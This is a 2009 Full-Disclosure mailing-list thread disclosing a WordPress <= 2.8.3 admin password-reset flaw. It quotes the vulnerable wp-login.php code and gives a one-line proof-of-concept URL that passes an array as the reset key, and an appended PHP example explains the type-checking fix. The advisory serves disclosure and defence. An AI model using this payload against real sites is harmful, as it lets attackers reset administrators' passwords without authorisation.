Hi there,

This wasn't tested on the 2.7.* branch. It has been tested on the 2.8.* branch, with PHP 5.3.0 & PHP 5.2.9 as an Apache 2.2.12 module, on a Linux env.
Regards
Laurent Gaffié

2009/8/10 Nicolas Valcárcel Scerpella <[email protected]>

> I don't see the issue with wp 2.7.1
>
> On Mon, 10 Aug 2009, laurent gaffie wrote:
>
> > Errata:
> >
> > "V. BUSINESS IMPACT
> > -------------------------
> > An attacker could exploit this vulnerability to compromise the admin account
> > of any wordpress/wordpress-mu <= 2.8.3"
> >
> > -->
> >
> > "V. BUSINESS IMPACT
> > -------------------------
> > An attacker could exploit this vulnerability to reset the admin account of
> > any wordpress/wordpress-mu <= 2.8.3"
> >
> > Regards
> > Laurent Gaffié
> >
> > 2009/8/10 laurent gaffie <[email protected]>
> >
> > > =============================================
> > > - Release date: August 10th, 2009
> > > - Discovered by: Laurent Gaffié
> > > - Severity: Medium
> > > =============================================
> > >
> > > I. VULNERABILITY
> > > -------------------------
> > > WordPress <= 2.8.3 Remote admin reset password
> > >
> > > II. BACKGROUND
> > > -------------------------
> > > WordPress is a state-of-the-art publishing platform with a focus on
> > > aesthetics, web standards, and usability.
> > > WordPress is both free and priceless at the same time.
> > > More simply, WordPress is what you use when you want to work with your
> > > blogging software, not fight it.
> > >
> > > III. DESCRIPTION
> > > -------------------------
> > > The way WordPress handles a password reset looks like this:
> > > You submit your email address or username via this form:
> > > /wp-login.php?action=lostpassword
> > > WordPress sends you a reset confirmation like this via email:
> > >
> > > "
> > > Someone has asked to reset the password for the following site and
> > > username.
> > > http://DOMAIN_NAME.TLD/wordpress
> > > Username: admin
> > > To reset your password visit the following address, otherwise just ignore
> > > this email and nothing will happen
> > >
> > > http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> > > "
> > >
> > > You click on the link, and then WordPress resets your admin password, and
> > > sends you another email with your new credentials.
> > >
> > > Let's see how it works:
> > >
> > > wp-login.php:
> > > ...[snip]...
> > > line 186:
> > > function reset_password($key) {
> > >     global $wpdb;
> > >
> > >     $key = preg_replace('/[^a-z0-9]/i', '', $key);
> > >
> > >     if ( empty( $key ) )
> > >         return new WP_Error('invalid_key', __('Invalid key'));
> > >
> > >     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
> > >     if ( empty( $user ) )
> > >         return new WP_Error('invalid_key', __('Invalid key'));
> > > ...[snip]...
> > > line 276:
> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> > > $errors = new WP_Error();
> > >
> > > if ( isset($_GET['key']) )
> > >     $action = 'resetpass';
> > >
> > > // validate action so as to default to the login screen
> > > if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
> > >     $action = 'login';
> > > ...[snip]...
> > >
> > > line 370:
> > >
> > >     break;
> > >
> > > case 'resetpass' :
> > > case 'rp' :
> > >     $errors = reset_password($_GET['key']);
> > >
> > >     if ( ! is_wp_error($errors) ) {
> > >         wp_redirect('wp-login.php?checkemail=newpass');
> > >         exit();
> > >     }
> > >
> > >     wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> > >     exit();
> > >
> > >     break;
> > > ...[snip]...
> > >
> > > You can abuse the password reset function, bypass the first step and
> > > then reset the admin password by submitting an array to the $key
> > > variable.
> > >
> > > IV. PROOF OF CONCEPT
> > > -------------------------
> > > A web browser is sufficient to reproduce this proof of concept:
> > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
> > > The password will be reset without any confirmation.
> > >
> > > V. BUSINESS IMPACT
> > > -------------------------
> > > An attacker could exploit this vulnerability to compromise the admin
> > > account of any wordpress/wordpress-mu <= 2.8.3
> > >
> > > VI. SYSTEMS AFFECTED
> > > -------------------------
> > > All
> > >
> > > VII. SOLUTION
> > > -------------------------
> > > No patch available for the moment.
> > >
> > > VIII. REFERENCES
> > > -------------------------
> > > http://www.wordpress.org
> > >
> > > IX. CREDITS
> > > -------------------------
> > > This vulnerability has been discovered by Laurent Gaffié
> > > Laurent.gaffie{remove-this}(at)gmail.com
> > > I'd like to shoot some greetz to securityreason.com for their great
> > > research on PHP, as for this under-estimated vulnerability discovered by
> > > Maksymilian Arciemowicz:
> > > http://securityreason.com/achievement_securityalert/38
> > >
> > > X. REVISION HISTORY
> > > -------------------------
> > > August 10th, 2009: Initial release
> > >
> > > XI. LEGAL NOTICES
> > > -------------------------
> > > The information contained within this advisory is supplied "as-is"
> > > with no warranties or guarantees of fitness of use or otherwise.
> > > I accept no responsibility for any damage caused by the use or
> > > misuse of this information.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Nicolas Valcárcel
> Security Engineer
> Custom Engineering Solutions Group
> Canonical OEM Services
> Mobile: +511 994 293 200
> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9 DD12 524E C3CD EF58 4970
> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
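The input-validation gap behind the quoted reset_password() excerpt, as an added stand-alone PHP example (not WordPress code, and not part of the thread above): when a query string uses `key[]=`, PHP populates `$_GET['key']` with an array rather than a string; `preg_replace()` accepts an array subject and returns an array, and `empty()` is false for any non-empty array, so the `empty($key)` guard lets the value through to the query. The function name `validate_reset_key()` and the three constructed inputs are my own; the hardened check simply refuses anything that is not a non-empty string before sanitising.

```php
<?php
// Added example, not WordPress code. Shows why the empty() guard in the
// quoted reset_password() does not stop an array-valued "key" parameter,
// and what a type-strict check looks like.

/**
 * Return the sanitised reset key, or null when the input is unusable.
 * Hypothetical replacement for the guard in the advisory's excerpt.
 */
function validate_reset_key($key) {
    // Reject arrays (and anything else that is not a string) up front.
    // preg_replace() would return an array here, and empty() would not catch it.
    if (!is_string($key)) {
        return null;
    }
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ($key === '') {
        return null;
    }
    return $key;
}

/**
 * The original 2.8.3-style guard, reproduced only to compare its verdict.
 * Returns true when the value would survive the empty() check.
 */
function legacy_guard_passes($key) {
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    return !empty($key);
}

// Constructed stand-ins for $_GET['key'] in three request shapes.
$inputs = array(
    'key=o7na...'  => 'o7naCKN3OoeU2KJMMsag',  // normal reset link
    'key='         => '',                      // empty string
    'key[]='       => array(''),               // array, the case the advisory abuses
);

foreach ($inputs as $label => $key) {
    $filtered = preg_replace('/[^a-z0-9]/i', '', $key);
    printf("%-14s preg_replace returns %-6s legacy empty() guard passes: %-3s validate_reset_key: %s\n",
        $label,
        gettype($filtered),
        legacy_guard_passes($key) ? 'yes' : 'no',
        var_export(validate_reset_key($key), true));
}
```

Run with `php example.php`: the array input is the only one where the legacy guard and the strict check disagree, because `preg_replace()` hands back `array('')`, which `empty()` does not treat as empty. Rejecting non-string request parameters before they reach sanitisation or a prepared statement is the general defence; the same pattern applies to any `$_GET`/`$_POST` value that code assumes is scalar.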
